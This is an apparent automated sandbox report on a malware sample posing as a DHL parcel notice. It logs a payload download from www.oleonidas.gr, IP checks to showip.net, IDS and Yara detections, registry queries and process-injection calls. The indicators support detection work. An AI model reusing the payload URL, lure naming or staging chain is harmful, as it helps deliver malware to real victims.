Source: C:\Users\user\AppData\Roaming\Size.exe	Code function: 4x nop then jmp 06EDC87Ch	6_2_06EDC66D
Source: C:\Users\user\AppData\Roaming\Size.exe	Code function: 4x nop then jmp 06EDC87Ch	6_2_06EDC670
Source: C:\Users\user\AppData\Roaming\Size.exe	Code function: 4x nop then jmp 0708C023h	6_2_0708C0E4
Source: C:\Users\user\AppData\Roaming\Size.exe	Code function: 4x nop then jmp 0708C023h	6_2_0708BD10
Source: C:\Users\user\AppData\Roaming\Size.exe	Code function: 4x nop then jmp 0708C023h	6_2_0708BD98
Source: C:\Users\user\AppData\Roaming\Size.exe	Code function: 4x nop then jmp 0708C023h	6_2_0708BD91
Source: C:\Users\user\AppData\Roaming\Size.exe	Code function: 4x nop then jmp 0708C023h	6_2_0708BDA0
Source: C:\Users\user\AppData\Roaming\Size.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h	6_2_072F1512

Source: global traffic	HTTP traffic detected: GET /slim/Xisav.wav HTTP/1.1Host: www.oleonidas.grConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /slim/Xisav.wav HTTP/1.1Host: www.oleonidas.grConnection: Keep-Alive

Source: Joe Sandbox View

IP Address: 162.55.60.2 162.55.60.2

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown

DNS query: name: showip.net

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:56543 -> 162.55.60.2:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49705 -> 162.55.60.2:80
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.5:49706
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.5:59352
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.5:59358

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 2_2_004328B0 InternetOpenA,InternetOpenUrlA,InternetReadFile,

2_2_004328B0

Source: global traffic	HTTP traffic detected: GET /slim/Xisav.wav HTTP/1.1Host: www.oleonidas.grConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /slim/Xisav.wav HTTP/1.1Host: www.oleonidas.grConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Project1Host: showip.net
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Project1Host: showip.net

Source: global traffic	DNS traffic detected: DNS query: www.oleonidas.gr
Source: global traffic	DNS traffic detected: DNS query: showip.net
Source: global traffic	DNS traffic detected: DNS query: 241.42.69.40.in-addr.arpa

Source: InstallUtil.exe, 00000007.00000002.3288442045.0000000000E55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schema.org
Source: DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2097900919.00000000027E1000.00000004.00000800.00020000.00000000.sdmp, Size.exe, 00000006.00000002.2293133444.0000000003271000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: InstallUtil.exe, 00000002.00000002.3288495105.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3288442045.0000000000E35000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://showip.net
Source: InstallUtil.exe, 00000002.00000002.3288495105.0000000000E29000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3288442045.0000000000E35000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3288442045.0000000000E0E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://showip.net/
Source: InstallUtil.exe, 00000007.00000002.3288442045.0000000000E0E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://showip.net/(
Source: InstallUtil.exe, 00000002.00000002.3288495105.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://showip.net/3
Source: InstallUtil.exe, 00000007.00000002.3288442045.0000000000E35000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://showip.net/g
Source: InstallUtil.exe, 00000002.00000002.3288495105.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://showip.net/r
Source: InstallUtil.exe, 00000002.00000002.3288495105.0000000000E29000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://showip.net/t
Source: InstallUtil.exe, 00000007.00000002.3288442045.0000000000E35000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://showip.net/w
Source: InstallUtil.exe, 00000002.00000002.3288495105.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://showip.net6D3
Source: InstallUtil.exe, 00000007.00000002.3288442045.0000000000E35000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://showip.netll
Source: InstallUtil.exe, 00000002.00000002.3288495105.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://showip.netth
Source: InstallUtil.exe, 00000007.00000002.3288442045.0000000000E55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.maxmind.com
Source: InstallUtil.exe, 00000002.00000002.3288495105.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.3289964413.0000000000E93000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.3289833245.0000000000E7E000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.3288495105.0000000000E36000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.3288495105.0000000000E29000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.3289735627.0000000000E72000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3288442045.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3288442045.0000000000E41000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3291202922.0000000003B10000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3291202922.0000000003B17000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fundingchoicesmessages.google.com/i/pub-8790158038613050?ers=1
Source: DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2110603697.0000000003F68000.00000004.00000800.00020000.00000000.sdmp, DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2116558407.00000000066F0000.00000004.08000000.00040000.00000000.sdmp, DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2110603697.00000000039C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2110603697.0000000003F68000.00000004.00000800.00020000.00000000.sdmp, DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2116558407.00000000066F0000.00000004.08000000.00040000.00000000.sdmp, DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2110603697.00000000039C4000.00000004.00000800.00020000.00000000.sdmp, Size.exe, 00000006.00000002.2310176986.0000000004A3D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2110603697.0000000003F68000.00000004.00000800.00020000.00000000.sdmp, DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2116558407.00000000066F0000.00000004.08000000.00040000.00000000.sdmp, DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2110603697.00000000039C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: InstallUtil.exe, 00000007.00000002.3288442045.0000000000E55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://showip.net/
Source: InstallUtil.exe, 00000007.00000002.3288442045.0000000000E55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://showip.net/?checkip=
Source: DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2110603697.0000000003F68000.00000004.00000800.00020000.00000000.sdmp, DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2116558407.00000000066F0000.00000004.08000000.00040000.00000000.sdmp, DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2110603697.00000000039C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2110603697.0000000003F68000.00000004.00000800.00020000.00000000.sdmp, DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2116558407.00000000066F0000.00000004.08000000.00040000.00000000.sdmp, DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2097900919.000000000288C000.00000004.00000800.00020000.00000000.sdmp, DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2110603697.00000000039C4000.00000004.00000800.00020000.00000000.sdmp, Size.exe, 00000006.00000002.2293133444.000000000331C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2110603697.0000000003F68000.00000004.00000800.00020000.00000000.sdmp, DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2116558407.00000000066F0000.00000004.08000000.00040000.00000000.sdmp, DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2110603697.00000000039C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: InstallUtil.exe, 00000007.00000002.3288442045.0000000000E55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://unpkg.com/leaflet
Source: InstallUtil.exe, 00000002.00000002.3291176137.0000000003A20000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.3288495105.0000000000E32000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.3289964413.0000000000E93000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3288442045.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3288442045.0000000000E41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=G-L6NKT5G6D7
Source: DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2097900919.00000000027E1000.00000004.00000800.00020000.00000000.sdmp, Size.exe, 00000006.00000002.2293133444.0000000003271000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.oleonidas.gr
Source: DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2097900919.00000000027E1000.00000004.00000800.00020000.00000000.sdmp, Size.exe, 00000006.00000002.2293133444.0000000003271000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.oleonidas.gr/slim/Xisav.wav
Source: InstallUtil.exe, 00000007.00000002.3288442045.0000000000E55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.openstreetmap.org/copyright

Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713

Source: unknown	HTTPS traffic detected: 185.78.221.73:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.78.221.73:443 -> 192.168.2.5:49713 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.2110603697.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 00000006.00000002.2310176986.000000000443C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 00000006.00000002.2310176986.000000000433F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Writes or reads registry keys via WMI

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey

Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Code function: 0_2_06779348 NtResumeThread,	0_2_06779348
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Code function: 0_2_06778310 NtProtectVirtualMemory,	0_2_06778310
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Code function: 0_2_067792B8 NtResumeThread,	0_2_067792B8
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Code function: 0_2_06779340 NtResumeThread,	0_2_06779340
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Code function: 0_2_0677830A NtProtectVirtualMemory,	0_2_0677830A
Source: C:\Users\user\AppData\Roaming\Size.exe	Code function: 6_2_07088310 NtProtectVirtualMemory,	6_2_07088310
Source: C:\Users\user\AppData\Roaming\Size.exe	Code function: 6_2_07089348 NtResumeThread,	6_2_07089348
Source: C:\Users\user\AppData\Roaming\Size.exe	Code function: 6_2_0708830A NtProtectVirtualMemory,	6_2_0708830A
Source: C:\Users\user\AppData\Roaming\Size.exe	Code function: 6_2_0708830C NtProtectVirtualMemory,	6_2_0708830C
Source: C:\Users\user\AppData\Roaming\Size.exe	Code function: 6_2_07089340 NtResumeThread,	6_2_07089340

Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Code function: 0_2_027BB338	0_2_027BB338
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Code function: 0_2_027B4160	0_2_027B4160
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Code function: 0_2_027B34B8	0_2_027B34B8
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Code function: 0_2_027B7250	0_2_027B7250
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Code function: 0_2_027B7241	0_2_027B7241
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Code function: 0_2_027BB328	0_2_027BB328
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Code function: 0_2_027B7C10	0_2_027B7C10
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Code function: 0_2_027B7C01	0_2_027B7C01
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Code function: 0_2_065CD768	0_2_065CD768
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Code function: 0_2_065CE9B5	0_2_065CE9B5
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Code function: 0_2_065CD758	0_2_065CD758
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Code function: 0_2_065C8878	0_2_065C8878
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Code function: 0_2_065E57E7	0_2_065E57E7
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Code function: 0_2_065E0040	0_2_065E0040
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Code function: 0_2_065EE8E0	0_2_065EE8E0
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Code function: 0_2_065E19A3	0_2_065E19A3
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Code function: 0_2_065E3D00	0_2_065E3D00
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Code function: 0_2_065E75DA	0_2_065E75DA
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Code function: 0_2_065E75E0	0_2_065E75E0
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Code function: 0_2_065E0006	0_2_065E0006
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Code function: 0_2_065EE8D0	0_2_065EE8D0
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Code function: 0_2_065ED090	0_2_065ED090
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Code function: 0_2_065ED080	0_2_065ED080
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Code function: 0_2_0675CD30	0_2_0675CD30
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Code function: 0_2_06750040	0_2_06750040
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Code function: 0_2_06750007	0_2_06750007
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Code function: 0_2_0675892E	0_2_0675892E
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Code function: 0_2_06759918	0_2_06759918
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Code function: 0_2_06759908	0_2_06759908
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Code function: 0_2_06775B78	0_2_06775B78
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Code function: 0_2_06774840	0_2_06774840
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Code function: 0_2_06778080	0_2_06778080
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Code function: 0_2_06771660	0_2_06771660
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Code function: 0_2_0677165D	0_2_0677165D
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Code function: 0_2_06775A15	0_2_06775A15
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Code function: 0_2_06778072	0_2_06778072
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Code function: 0_2_067A0040	0_2_067A0040
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Code function: 0_2_067A0023	0_2_067A0023
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Code function: 0_2_069E2FFA	0_2_069E2FFA
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Code function: 0_2_069EB590	0_2_069EB590
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Code function: 0_2_069EB5A0	0_2_069EB5A0
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Code function: 0_2_069E3008	0_2_069E3008
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Code function: 0_2_069EB050	0_2_069EB050
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Code function: 0_2_06A6E700	0_2_06A6E700
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Code function: 0_2_06A50023	0_2_06A50023
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Code function: 0_2_06A50040	0_2_06A50040
Source: C:\Users\user\AppData\Roaming\Size.exe	Code function: 6_2_0307B338	6_2_0307B338
Source: C:\Users\user\AppData\Roaming\Size.exe	Code function: 6_2_03074160	6_2_03074160
Source: C:\Users\user\AppData\Roaming\Size.exe	Code function: 6_2_0307B328	6_2_0307B328
Source: C:\Users\user\AppData\Roaming\Size.exe	Code function: 6_2_03077241	6_2_03077241
Source: C:\Users\user\AppData\Roaming\Size.exe	Code function: 6_2_03077250	6_2_03077250
Source: C:\Users\user\AppData\Roaming\Size.exe	Code function: 6_2_03077C01	6_2_03077C01
Source: C:\Users\user\AppData\Roaming\Size.exe	Code function: 6_2_03077C10	6_2_03077C10
Source: C:\Users\user\AppData\Roaming\Size.exe	Code function: 6_2_06EDD768	6_2_06EDD768
